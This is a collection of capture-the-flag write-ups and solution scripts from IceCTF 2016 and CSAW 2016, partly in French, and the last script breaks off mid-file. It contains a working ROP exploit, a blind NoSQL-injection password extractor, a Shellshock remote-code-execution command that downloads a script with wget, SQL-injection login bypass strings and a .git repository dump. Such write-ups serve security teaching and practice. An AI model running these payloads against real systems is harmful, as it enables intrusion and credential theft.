-------------------------------------------------------------------------------- /2016/IceCTF2016/misc/matrix/matrix2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/misc/matrix/matrix2.png -------------------------------------------------------------------------------- /2016/IceCTF2016/misc/scavenger_hunt/crawl.py: -------------------------------------------------------------------------------- 1 | #!/usr/python 2 | 3 | import requests 4 | import re 5 | 6 | p = re.compile(ur'IceCTF\{.*\}') 7 | 8 | urls = ["https://icec.tf", "https://icec.tf/about", "https://icec.tf/faq", "https://icec.tf/contact", "https://icec.tf/sponsors"] 9 | 10 | for url in urls: 11 | r = requests.get(url) 12 | res = re.search(p, r.text) 13 | if res: 14 | print "Flag found in "+url+"==>"+res.group(0) 15 | else: 16 | print "No flag in "+url 17 | -------------------------------------------------------------------------------- /2016/IceCTF2016/misc/scavenger_hunt/readme.md: -------------------------------------------------------------------------------- 1 | #Scavenger Hunt 2 | 3 | The flag is in a site page, let's crawl it with an home-made script : 4 | 5 | No flag in https://icec.tf 6 | No flag in https://icec.tf/about 7 | No flag in https://icec.tf/faq 8 | No flag in https://icec.tf/contact 9 | Flag found in https://icec.tf/sponsors==>IceCTF{Y0u_c4n7_533_ME_iM_h1Din9} 10 | 11 | -------------------------------------------------------------------------------- /2016/IceCTF2016/misc/search/readme.md: -------------------------------------------------------------------------------- 1 | # Search (Misc · 40 pt) 2 | 3 | We have as a information "...maybe its all about the conTEXT." The challenge insists well on 'TEXT' 4 | 5 | ``` 6 | dig -t txt search.icec.tf 7 | 8 | ; <<>> DiG 9.9.5-9+deb8u6-Debian <<>> -t txt search.icec.tf 9 | ;; global options: +cmd 10 | ;; Got answer: 11 | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 15523 12 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 3 13 | 14 | ;; OPT PSEUDOSECTION: 15 | ; EDNS: version: 0, flags:; udp: 4096 16 | ;; QUESTION SECTION: 17 | ;search.icec.tf. IN TXT 18 | 19 | ;; ANSWER SECTION: 20 | search.icec.tf. 300 IN TXT "IceCTF{flag5_all_0v3r_the_Plac3}" 21 | ... 22 | ``` 23 | 24 | The flag is : IceCTF{flag5_all_0v3r_the_Plac3} 25 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Demo/README.md: -------------------------------------------------------------------------------- 1 | # Demo 2 | 3 | So I didn't know what was the basename fct and didn't want to spend a lot of time reading the doc. 4 | 5 | I updated the original script to print what basename would return. 6 | ``` 7 | mkdir /tmp/bi 8 | cd /tmp/bi 9 | cp /home/demo/demo.c /tmp/bi 10 | vi /tmp/bi/demo.c 11 | ``` 12 | 13 | I added printf of basename and it printed: 14 | 15 | ``` 16 | $ /tmp/bi/demo 17 | demo 18 | ``` 19 | 20 | So I realized we just had to match the basename to icesh, I created a bash script: 21 | 22 | ``` 23 | vi /tmp/bi/icesh 24 | 25 | #/bin/sh 26 | /home/demo/demo 27 | ``` 28 | 29 | Then ran it and got the shell 30 | 31 | ``` 32 | ./tmp/bi/icesh 33 | cat /home/demo/flag.txt 34 | ``` 35 | 36 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/Gh.hop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/pwn/Ropi/Gh.hop -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/NC: -------------------------------------------------------------------------------- 1 | nc ropi.vuln.icec.tf 6500 2 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/flag.txt: -------------------------------------------------------------------------------- 1 | YES 2 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/p.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import socket 4 | 5 | 6 | def adr_to_str16(add): 7 | a = hex(add + 0x1000000000000000) 8 | ret = chr(int(a[16:18], 16)) 9 | ret += chr(int(a[14:16], 16)) 10 | ret += chr(int(a[12:14], 16)) 11 | ret += chr(int(a[10:12], 16)) 12 | return ret 13 | 14 | 15 | 16 | ORI=adr_to_str16(0x080485c4) 17 | AG2=adr_to_str16(0xabcdefff) 18 | AG3=adr_to_str16(0x78563412) 19 | RET=adr_to_str16(0x08048569) 20 | AG1=adr_to_str16(0xbadbeeef) 21 | EZY=adr_to_str16(0x0804852d) 22 | PP1=adr_to_str16(0x08048395) 23 | PP2=adr_to_str16(0x080486ee) 24 | PRO=adr_to_str16(0x0804862c) 25 | FIN=adr_to_str16(0x08048400) 26 | pile1=RET+PP1+AG1+EZY 27 | pile1=44*"A"+pile1+"AAAA" 28 | # cette pile de longueur 0x40 = 64 va enchainer ret(AG1) puis ezy() 29 | # cette pile va enchainer ori(AG2,AG3) 30 | pile2=ORI+PP2+AG2+AG3+EZY 31 | pile2=44*"A"+pile2 32 | pile3=PRO+EZY*4 33 | pile3=44*"A"+pile3 34 | pile4=44*"A"+FIN*5 35 | 36 | 37 | HOST = "ropi.vuln.icec.tf" 38 | PORT = 6500 39 | s = socket.socket() 40 | s.connect((HOST, PORT)) 41 | readbuffer=s.recv(1024) 42 | print readbuffer 43 | s.send(pile1) 44 | readbuffer=s.recv(1024) 45 | print readbuffer 46 | s.send(pile2) 47 | readbuffer=s.recv(1024) 48 | print readbuffer 49 | s.send(pile3) 50 | readbuffer=s.recv(1024) 51 | print readbuffer 52 | s.send(pile4) 53 | readbuffer=s.recv(1024) 54 | print readbuffer 55 | s.close() 56 | 57 | # francois@athos:~/tmp/Gh/C2$ python p.py 58 | # Benvenuti al convegno RetOri Pro! 59 | # Vuole lasciare un messaggio? 60 | # 61 | # [+] aperto 62 | # 63 | # Benvenuti al convegno RetOri Pro! 64 | # Vuole lasciare un messaggio? 65 | # 66 | # [+] leggi 67 | # Benvenuti al convegno RetOri Pro! 68 | # Vuole lasciare un messaggio? 69 | # 70 | # [+] stampare 71 | # IceCTF{italiano_ha_portato_a_voi_da_google_tradurre} 72 | # Benvenuti al convegno RetOri Pro! 73 | # Vuole lasciare un messaggio? 74 | # 75 | # francois@athos:~/tmp/Gh/C2$ 76 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/pwn/Ropi/payload -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/pile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | def adr_to_str16(add): 3 | a = hex(add + 0x1000000000000000) 4 | ret = chr(int(a[16:18], 16)) 5 | ret += chr(int(a[14:16], 16)) 6 | ret += chr(int(a[12:14], 16)) 7 | ret += chr(int(a[10:12], 16)) 8 | return ret 9 | ORI=adr_to_str16(0x080485c4) 10 | AG2=adr_to_str16(0xabcdefff) 11 | AG3=adr_to_str16(0x78563412) 12 | RET=adr_to_str16(0x08048569) 13 | AG1=adr_to_str16(0xbadbeeef) 14 | pile=RET+ORI+AG1+AG2+AG3 15 | pile=(64-len(pile))*"A"+pile 16 | print pile 17 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/pile2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding: utf-8 3 | # Cette fonction transforme un entier en 4 caractères 4 | def adr_to_str16(add): 5 | a = hex(add + 0x1000000000000000) 6 | ret = chr(int(a[16:18], 16)) 7 | ret += chr(int(a[14:16], 16)) 8 | ret += chr(int(a[12:14], 16)) 9 | ret += chr(int(a[10:12], 16)) 10 | return ret 11 | # Le principe consiste à exécuter la fonction ret(AG1) qui ouvre flag, puis la 12 | # fonction ori(AG2,AG3) qui lit le fichier et enfin pro() qui affiche le buffer 13 | # On peut écraser la pile par 5 mots en envoyant 44 octets puis les 5 mots 14 | # Un appel de fonction se fait de la façon suivante 15 | # ...... 16 | # où pop n est un gadget faisoant n pop de la suite. 17 | # Lors du ret avec cette pile, on se retrouve au début de fct avec la pile 18 | # ...... 19 | # fct(ag1,...,agn) s'effectue puis le retour se fait sur pop n avec comme pile 20 | # ...... 21 | # Ce pop n «pope» les arguments et fait un return sur la pile ... 22 | # Il faudrait ici faire donc comme pile 23 | # RET+PP1+AG1+ORI+PP2+AG2+AG3+PRO 24 | # mais cela dépasse la taille de 5 mots possibles pour écraser la pile 25 | # On utilise une astuce en réappelant la fonction ezy() pour refaire un 26 | # nouvel écrasement de la pile 27 | 28 | ORI=adr_to_str16(0x080485c4) 29 | AG2=adr_to_str16(0xabcdefff) 30 | AG3=adr_to_str16(0x78563412) 31 | RET=adr_to_str16(0x08048569) 32 | AG1=adr_to_str16(0xbadbeeef) 33 | EZY=adr_to_str16(0x0804852d) 34 | PP1=adr_to_str16(0x08048395) 35 | PP2=adr_to_str16(0x080486ee) 36 | PRO=adr_to_str16(0x0804862c) 37 | pile=RET+PP1+AG1+EZY 38 | pile=44*"A"+pile+"AAA" 39 | # cette pile de longueur 0x40 = 64 va enchainer ret(AG1) puis ezy() 40 | print pile 41 | # cette pile va enchainer ori(AG2,AG3) puis pro() 42 | pile=ORI+PP2+AG2+AG3+PRO 43 | pile=44*"A"+pile 44 | print pile 45 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/pile3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import socket 4 | 5 | 6 | def adr_to_str16(add): 7 | a = hex(add + 0x1000000000000000) 8 | ret = chr(int(a[16:18], 16)) 9 | ret += chr(int(a[14:16], 16)) 10 | ret += chr(int(a[12:14], 16)) 11 | ret += chr(int(a[10:12], 16)) 12 | return ret 13 | 14 | 15 | 16 | ORI=adr_to_str16(0x080485c4) 17 | AG2=adr_to_str16(0xabcdefff) 18 | AG3=adr_to_str16(0x78563412) 19 | RET=adr_to_str16(0x08048569) 20 | AG1=adr_to_str16(0xbadbeeef) 21 | EZY=adr_to_str16(0x0804852d) 22 | PP1=adr_to_str16(0x08048395) 23 | PP2=adr_to_str16(0x080486ee) 24 | PRO=adr_to_str16(0x0804862c) 25 | FIN=adr_to_str16(0x08048400) 26 | pile1=RET+PP1+AG1+EZY 27 | pile1=44*"A"+pile1+"AAAA" 28 | # cette pile de longueur 0x40 = 64 va enchainer ret(AG1) puis ezy() 29 | # cette pile va enchainer ori(AG2,AG3) puis ezy() 30 | # puis pro() puis ezy() 31 | # et enfin exit() 32 | pile2=ORI+PP2+AG2+AG3+EZY 33 | pile2=43*"A"+pile2 34 | pile3=PRO+EZY*4 35 | pile3=43*"A"+pile3 36 | pile4=43*"A"+FIN*5 37 | 38 | 39 | print(pile1) 40 | print(pile2) 41 | print(pile3) 42 | print(pile4) 43 | 44 | # francois@athos:~/tmp/Gh/C2$ python p.py 45 | # Benvenuti al convegno RetOri Pro! 46 | # Vuole lasciare un messaggio? 47 | # 48 | # [+] aperto 49 | # 50 | # Benvenuti al convegno RetOri Pro! 51 | # Vuole lasciare un messaggio? 52 | # 53 | # [+] leggi 54 | # Benvenuti al convegno RetOri Pro! 55 | # Vuole lasciare un messaggio? 56 | # 57 | # [+] stampare 58 | # IceCTF{italiano_ha_portato_a_voi_da_google_tradurre} 59 | # Benvenuti al convegno RetOri Pro! 60 | # Vuole lasciare un messaggio? 61 | # 62 | # francois@athos:~/tmp/Gh/C2$ 63 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/readme.md: -------------------------------------------------------------------------------- 1 | On trouve dans cette archive 2 | * un source.c donnant le pseudo code des processus (merci Hopper) 3 | * le binaire Gh 4 | * 2 fichiers pile.py, pile2.py et pile3.py faisant le chall en local: 5 | Le fichier flag.txt contient YES: 6 | ``` 7 | francois@athos:~/tmp/Gh/C2$ python pile.py | ./Gh 8 | Benvenuti al convegno RetOri Pro! 9 | Vuole lasciare un messaggio? 10 | [+] aperto 11 | [+] leggi 12 | Erreur de segmentation 13 | francois@athos:~/tmp/Gh/C2$ python pile2.py | ./Gh 14 | Benvenuti al convegno RetOri Pro! 15 | Vuole lasciare un messaggio? 16 | [+] aperto 17 | Benvenuti al convegno RetOri Pro! 18 | Vuole lasciare un messaggio? 19 | [+] leggi 20 | [+] stampare 21 | YES 22 | Erreur de segmentation 23 | francois@athos:~/tmp/Gh/C2$ python pile3.py | ./Gh 24 | Benvenuti al convegno RetOri Pro! 25 | Vuole lasciare un messaggio? 26 | [+] aperto 27 | Benvenuti al convegno RetOri Pro! 28 | Vuole lasciare un messaggio? 29 | [+] leggi 30 | Benvenuti al convegno RetOri Pro! 31 | Vuole lasciare un messaggio? 32 | [+] stampare 33 | YES 34 | Benvenuti al convegno RetOri Pro! 35 | Vuole lasciare un messaggio? 36 | francois@athos:~/tmp/Gh/C2$ 37 | ``` 38 | 39 | Le fichier pile2.py contient les explications. 40 | Les gadgets utilisés sont 41 | 0x08048395 : pop ebx ; ret 42 | 0x080486ee : pop edi ; pop ebp ; ret 43 | 44 | p.py est l'adaptation du challenge en remote. 45 | ``` 46 | francois@athos:~/tmp/Gh/C2$ python p.py 47 | Benvenuti al convegno RetOri Pro! 48 | Vuole lasciare un messaggio? 49 | 50 | [+] aperto 51 | 52 | Benvenuti al convegno RetOri Pro! 53 | Vuole lasciare un messaggio? 54 | 55 | [+] leggi 56 | Benvenuti al convegno RetOri Pro! 57 | Vuole lasciare un messaggio? 58 | 59 | [+] stampare 60 | IceCTF{italiano_ha_portato_a_voi_da_google_tradurre} 61 | Benvenuti al convegno RetOri Pro! 62 | Vuole lasciare un messaggio? 63 | 64 | francois@athos:~/tmp/Gh/C2$ 65 | 66 | Le flag est «IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}» 67 | ``` 68 | -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/ropi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/pwn/Ropi/ropi -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/solution.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/pwn/Ropi/solution.zip -------------------------------------------------------------------------------- /2016/IceCTF2016/pwn/Ropi/source.c: -------------------------------------------------------------------------------- 1 | function main { 2 | ezy(); 3 | puts("addio!"); 4 | return 0x0; 5 | } 6 | 7 | function ezy { 8 | puts("Benvenuti al convegno RetOri Pro!\nVuole lasciare un messaggio?"); 9 | eax = *stdout@@GLIBC_2.0; 10 | fflush(eax); 11 | eax = read(0x0, var_28, 0x40); 12 | return eax; 13 | } 14 | 15 | function ret { 16 | if (arg0 != 0xbadbeeef) { 17 | puts("chiave sbagliata! :("); 18 | exit(0x1); 19 | } 20 | else { 21 | *fd = open("./flag.txt", 0x0); 22 | puts("[+] aperto"); 23 | eax = *stdout@@GLIBC_2.0; 24 | fflush(eax); 25 | } 26 | return; 27 | } 28 | 29 | function ori { 30 | if ((arg0 != 0xabcdefff) && (arg1 != 0x78563412)) { 31 | puts("chiave sbagliata! :(("); 32 | exit(0x1); 33 | } 34 | else { 35 | eax = *fd; 36 | read(eax, 0x804a080, 0x80); 37 | puts("[+] leggi"); 38 | eax = *stdout@@GLIBC_2.0; 39 | fflush(eax); 40 | } 41 | return; 42 | } 43 | 44 | function pro { 45 | puts("[+] stampare"); 46 | printf(0x80487b7, 0x804a080); 47 | eax = *stdout@@GLIBC_2.0; 48 | eax = fflush(eax); 49 | return eax; 50 | } 51 | -------------------------------------------------------------------------------- /2016/IceCTF2016/recon/complacent/readme.md: -------------------------------------------------------------------------------- 1 | # Complacent (Reconnaissance · 40 pt) 2 | 3 | I used nikto to scan the chall website: 4 | ```bash 5 | nikto -h https://complacent.vuln.icec.tf 6 | 7 | - Nikto v2.1.6 8 | --------------------------------------------------------------------------- 9 | + Target IP: 104.154.248.13 10 | + Target Hostname: complacent.vuln.icec.tf 11 | + Target Port: 443 12 | --------------------------------------------------------------------------- 13 | + SSL Info: Subject: /C=IS/ST=Kingdom of IceCTF/L=IceCTF city/O=Secret IceCTF Buisness Corp/OU=Flag: IceCTF{this_1nformation_wasnt_h1dd3n_at_a11}/CN=complacent.icec.tf 14 | Ciphers: ECDHE-RSA-AES256-GCM-SHA384 15 | Issuer: /C=IS/ST=Kingdom of IceCTF/L=IceCTF city/O=Secret IceCTF Buisness Corp/OU=Flag: IceCTF{this_1nformation_wasnt_h1dd3n_at_a11}/CN=complacent.icec.tf 16 | ``` 17 | 18 | Flag was in SSL Certificate 19 | 20 | The flag is : IceCTF{this_1nformation_wasnt_h1dd3n_at_a11} 21 | -------------------------------------------------------------------------------- /2016/IceCTF2016/stegano/vape-nation/flag_vape.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/stegano/vape-nation/flag_vape.png -------------------------------------------------------------------------------- /2016/IceCTF2016/stegano/vape-nation/readme.md: -------------------------------------------------------------------------------- 1 | # Vape Nation (Stego · 50 pt) 2 | 3 | It's LSB method 4 | 5 | I use tool Stegsolve.jar -> Green plane 0 6 | 7 | I can read the flag on photo 8 | 9 | ![Alt](flag_vape.png "Flag Vape Nation") 10 | 11 | The flag is : IceCTF{420_CuR35_c4nCEr} 12 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/chainedIN/readme.md: -------------------------------------------------------------------------------- 1 | #ChainedIn WU 2 | 3 | First we can see website use mongoDB thanks to the logo 4 | 5 | Analyzing with firebug we can see data are sent as json. 6 | 7 | So I try to inject admin login, password should be the flag and begins with "IceCTF{" 8 | 9 | ``` 10 | ghozt@maze:~/ice/chained$ curl -H "Content-Type: application/json" -X POST -d '{"user":"admin","pass":{"$regex":"IceCTF{"}}' http://chainedin.vuln.icec.tf/login 11 | ``` 12 | 13 | It Works ! Let's script ! 14 | 15 | ```python 16 | #!/usr/python 17 | 18 | import requests 19 | import json 20 | 21 | url = "http://chainedin.vuln.icec.tf/login" 22 | 23 | charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789}_" 24 | 25 | print "[+] Getting password size ..." 26 | for i in range(7, 100): 27 | payload = {'user':'admin','pass':{'$regex':'.{'+str(i)+'}'}} 28 | r = requests.post(url, json=payload) 29 | if "Invalid" in r.text: 30 | print "[+] Password size is "+str(i-1) 31 | size = i 32 | break 33 | 34 | print "[+] Getting password" 35 | password = "IceCTF{" 36 | for i in range(7, size): 37 | for c in charset: 38 | payload = {'user':'admin','pass':{'$regex':password+c}} 39 | r = requests.post(url, json=payload) 40 | if "Administrator" in r.text: 41 | password = password + c 42 | print password 43 | continue 44 | 45 | ``` 46 | 47 | And the result : 48 | 49 | ``` 50 | [+] Getting password size ... 51 | [+] Password size is 55 52 | [+] Getting password 53 | IceCTF{I 54 | IceCTF{I_ 55 | ... 56 | IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo} 57 | ``` 58 | 59 | Done ! 60 | 61 | By ghozt 62 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/chainedIN/sploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/python 2 | 3 | import requests 4 | import json 5 | 6 | url = "http://chainedin.vuln.icec.tf/login" 7 | 8 | charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789}_" 9 | 10 | print "[+] Getting password size ..." 11 | for i in range(7, 100): 12 | payload = {'user':'admin','pass':{'$regex':'.{'+str(i)+'}'}} 13 | r = requests.post(url, json=payload) 14 | if "Invalid" in r.text: 15 | print "[+] Password size is "+str(i-1) 16 | size = i 17 | break 18 | 19 | print "[+] Getting password" 20 | password = "IceCTF{" 21 | for i in range(7, size+1): 22 | for c in charset: 23 | payload = {'user':'admin','pass':{'$regex':password+c}} 24 | r = requests.post(url, json=payload) 25 | if "Administrator" in r.text: 26 | password = password + c 27 | print password 28 | continue 29 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/exposed/README.md: -------------------------------------------------------------------------------- 1 | # Exposed 2 | 3 | In this example, we realized there was a flaw with the apache configuration, since we were able to clone the source files from the git repository. 4 | 5 | To get any repository from the website 6 | ```bash 7 | mkdir exposed 8 | git init 9 | git add remote origin http://exposed.vuln.icec.tf/.git 10 | git pull origin _hash_ 11 | ``` 12 | 13 | The hash list was in log file: 14 | 15 | ```bash 16 | wget http://exposed.vuln.icec.tf/.git/logs/heads/master 17 | ``` 18 | 19 | We only needed to pull every hash listed. 20 | 21 | (note: the file is not the same as the cloned one). 22 | flag was located in index.php file. 23 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/flag-storage/readme.md: -------------------------------------------------------------------------------- 1 | # Flag Storage (Web · 50 pt) 2 | 3 | Chall hint was “SQLi”, so let’s go ! 4 | 5 | ‘ OR 1 = 1; – in password field, some bullshit in login one aaaaaand it’s done ! 6 | 7 | The flag is : IceCTF{why_would_you_even_do_anything_client_side} 8 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/geoip/README.md: -------------------------------------------------------------------------------- 1 | # GeoIP 2 | 3 | The Team found that we could run RCE with this command: 4 | ```bash 5 | curl -v -H "User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo;/bin/bash -c 'perl /tmp/bi/DUbHRGqh select \* from 47a6fd2ca39d2b0d6eea1c30008dd889'" http://geocities.vuln.icec.tf/index.cgi 6 | ``` 7 | 8 | so I used pastebin to charge code in it : 9 | ```bash 10 | wget -P /tmp/bi/ http://pastebin.... 11 | ``` 12 | 13 | used following file: 14 | ```perl 15 | #!/usr/bin/perl 16 | use DBI; 17 | $my_cmd = ""; 18 | foreach $argnum(0 .. $#ARGV) { 19 | $my_cmd = $my_cmd . $ARGV[$argnum] . " "; 20 | } 21 | print $my_cmd; 22 | my $dbh = DBI->connect( 23 | "dbi:mysql:dbname=geocities;host=icectf_mariadb", 24 | "geocities", 25 | "geocities", 26 | { RaiseError => 1 }, 27 | ) or die $DBI::errstr; 28 | my $sth = $dbh->prepare($my_cmd); 29 | $sth->execute(); 30 | my $row; 31 | while ($row = $sth->fetchrow_arrayref()) { 32 | print "@$row\n"; 33 | } 34 | $sth->finish(); 35 | $dbh->disconnect(); 36 | 37 | ``` 38 | 39 | then could query the db easily using the script and all the arguments of the perl script as the mysql query 40 | 41 | ```bash 42 | curl -v -H "User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo;/bin/bash -c 'perl /tmp/bi/DUbHRGqh sql_query'" http://geocities.vuln.icec.tf/index.cgi 43 | 44 | ``` 45 | 46 | Results of the queries: 47 | 48 | ``` 49 | show tables; 50 | Posts 51 | 47a6fd2ca39d2b0d6eea1c30008dd889 52 | 53 | (note that * must be escaped in bash) 54 | Select \* from 47a6fd2ca39d2b0d6eea1c30008dd889; 55 | IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7} 56 | ``` 57 | 58 | We got the flag ! 59 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/kitty/README.md: -------------------------------------------------------------------------------- 1 | # kitty (web · 70 pt) 2 | 3 | They managed to secure their website this time and moved the hashing to the server :(. 4 | We managed to leak this hash of the admin's password though! c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a. 5 | Can you get the flag? kitty.vuln.icec.tf 6 | 7 | first I check the hash on hashtype checker :) 8 | 9 | https://md5hashing.net/hash_type_checker 10 | 11 | 12 | ``` 13 | c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a 14 | 15 | ``` 16 | 17 | it's a sha256 hash 18 | 19 | 20 | 2 solutions : 21 | 22 | We can use Hashcat to brute force it or we can check online if the hash is already known 23 | 24 | 25 | http://md5decrypt.net/Sha256/ 26 | 27 | 28 | ``` 29 | c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a : Vo83* 30 | 31 | ``` 32 | 33 | => kitty.vuln.icec.tf : admin / Vo83* 34 | 35 | 36 | Logged in! 37 | 38 | 39 | Your flag is: IceCTF{i_guess_hashing_isnt_everything_in_this_world} 40 | 41 | 42 | eilco 43 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/miners/README.md: -------------------------------------------------------------------------------- 1 | # Miners 2 | 3 | This one was really easy, it said you must login but there is not users in the database. The source code showed an obvious SQLI flaw on the username field. 4 | 5 | username : 6 | ``` 7 | asdf' union select 1,2,3 # 8 | ``` 9 | 10 | I was logged in and had the flag. 11 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/move-along/flag_move_along.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/web/move-along/flag_move_along.jpg -------------------------------------------------------------------------------- /2016/IceCTF2016/web/move-along/readme.md: -------------------------------------------------------------------------------- 1 | # Move Along (Web · 30 pt) 2 | 3 | Using firebug we can see http://move-along.vuln.icec.tf/move_along/ 4 | 5 | ``` 6 | Index of /move_along/ 7 | ../ 8 | 0f76da769d67e021518f05b552406ff6/ 10-Aug-2016 19:07 - 9 | nothing-to-see-here.jpg 10-Aug-2016 19:07 19453 10 | ``` 11 | 12 | Let’s move to http://move-along.vuln.icec.tf/move_along/0f76da769d67e021518f05b552406ff6/ 13 | 14 | Got an image secret.jpg containing the flag 15 | 16 | The flag is : IceCTF{tH3_c4t_15_Ou7_oF_THe_b49} 17 | -------------------------------------------------------------------------------- /2016/IceCTF2016/web/spotlight/readme.md: -------------------------------------------------------------------------------- 1 | * Spotlight (Web · 10 pt) 2 | 3 | We got an acces to : http://spotlight.vuln.icec.tf/ Black page, but when you move mouse, hale light appears. 4 | 5 | Analyzing with firebug 6 | 7 | ``` 8 | spotlight.js => console.log(“DEBUG: IceCTF{5tup1d_d3v5_w1th_th31r_l095}”); 9 | ``` 10 | 11 | The flag is : IceCTF{5tup1d_d3v5_w1th_th31r_l095} 12 | -------------------------------------------------------------------------------- /2016/csaw2016/forensic/clams_dont_dance/image0.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/forensic/clams_dont_dance/image0.gif -------------------------------------------------------------------------------- /2016/csaw2016/forensic/clams_dont_dance/readme.md: -------------------------------------------------------------------------------- 1 | **Clams don't dance** 2 | 3 | Le fichier mise à disposition pour le challenge était : out.img 4 | ```BASH 5 | foremost out.img 6 | ``` 7 | 8 | Foremost nous extrait trois dossiers : 9 | ```BASH 10 | mov pptx zip 11 | ``` 12 | Dans le dossier zip nous avons un fichier zip : 13 | 14 | ```BASH 15 | 16 | unzip 00010174.zip 17 | 18 | [Content_Types].xml docProps ppt _rels 19 | ``` 20 | Le zip contient tout l'architecure d'un fichier powerpoint . 21 | 22 | En regardant de plus près le dossier ppt/media , une image est présente dans le dossier mais absente du powerpoint 23 | 24 | ![Alt](image0.gif "image0.gif") 25 | 26 | Pour récupérer les informations contenu dans le QRCode , on upload l'image sur le site : 27 | 28 | [link](https://zxing.org/w/decode "Zxing.org decode") 29 | 30 | Dans le Raw text on vois le flag apparaitre : 31 | ```BASH 32 | flag{TH1NK ABOUT 1T B1LL. 1F U D13D, WOULD ANY1 CARE??} 33 | ``` 34 | by ark1nar 35 | -------------------------------------------------------------------------------- /2016/csaw2016/forensic/kill/readme.md: -------------------------------------------------------------------------------- 1 | #Kill 2 | 3 | We have a kill.pcapng 4 | 5 | 6 | ``` 7 | ghozt@maze:~/csaw/kill$ strings kill.pcapng | grep flag 8 | =flag{roses_r_blue_violets_r_r3d_mayb3_harambae_is_not_kill} 9 | ``` 10 | 11 | That's an epic forensic chall ! 12 | -------------------------------------------------------------------------------- /2016/csaw2016/misc/coinslot/coinslot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import re 5 | 6 | def answer(s, data="0\n"): 7 | s.send(data) 8 | s.recv(1000) 9 | 10 | TCP_IP = 'misc.chal.csaw.io' 11 | TCP_PORT = 8000 12 | BUFFER_SIZE = 1024 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | s.connect((TCP_IP, TCP_PORT)) 16 | for j in range (0,2016): 17 | text = s.recv(BUFFER_SIZE) 18 | print str(j)+ ":"+text 19 | match = re.search('(\d+)\.(\d\d)', text) 20 | s1 = match.group(0) 21 | print str(j)+" "+s1 22 | sum = round(float(s1)*100) 23 | left = int(sum) 24 | i1 = int(left / 1000000 ) 25 | left = left - i1 * 1000000 26 | i2 = int(left/ 500000) 27 | left = left - i2 * 500000 28 | i3 = int(left / 100000) 29 | left = left - i3 * 100000 30 | i4 = int(left / 50000) 31 | left = left - i4 * 50000 32 | i5 = int(left / 10000) 33 | left = left - i5 * 10000 34 | i6 = int(left / 5000) 35 | left = left - i6 * 5000 36 | i7 = int(left / 2000) 37 | left = left - i7 * 2000 38 | i8 = int(left / 1000) 39 | left = left - i8 * 1000 40 | i9 = int(left / 500) 41 | left = left - i9 * 500 42 | i10 = int(left / 100) 43 | left = left - i10 * 100 44 | i11 = int(left / 50) 45 | left = left - (i11 * 50) 46 | i12 = int(left / 25) 47 | left = left - (i12 * 25) 48 | i13 = int(left / 10) 49 | left = left - (i13 *10) 50 | i14 = int(left / 5) 51 | left = left - i14 * 5 52 | i15 = int(left / 1) 53 | left = left - i15 * 1 54 | answer(s, str(i1)+"\n") 55 | answer(s, str(i2)+"\n") 56 